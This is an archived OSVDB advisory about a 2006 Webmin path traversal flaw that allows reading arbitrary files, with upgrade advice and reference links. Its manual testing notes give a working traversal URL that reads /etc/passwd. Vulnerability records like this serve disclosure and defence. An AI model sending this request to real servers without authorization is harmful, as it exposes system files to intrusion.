Webmin Crafted Backslash Request Traversal Arbitrary File Access

2006-06-23T04:34:15
ID OSVDB:26771
Type osvdb
Reporter OSVDB
Modified 2006-06-23T04:34:15

Description

Solution Description

Upgrade to version 1.290 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd

References:

Vendor URL: http://www.webmin.com/ Vendor Specific News/Changelog Entry: http://www.webmin.com/changes.html Security Tracker: 1016375 Secunia Advisory ID:20777 Other Advisory URL: http://www.lac.co.jp/business/sns/intelligence/SNSadvisory_e/88_e.html Other Advisory URL: http://jvn.jp/jp/JVN%2367974490/index.html Nessus Plugin ID:21785 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0480.html Mail List Post: http://attrition.org/pipermail/vim/2006-June/000910.html Mail List Post: http://attrition.org/pipermail/vim/2006-June/000912.html Generic Exploit URL: http://securitydot.net/xpl/exploits/vulnerabilities/articles/1152/exploit.html FrSIRT Advisory: ADV-2006-2493 CVE-2006-3274 Bugtraq ID: 18613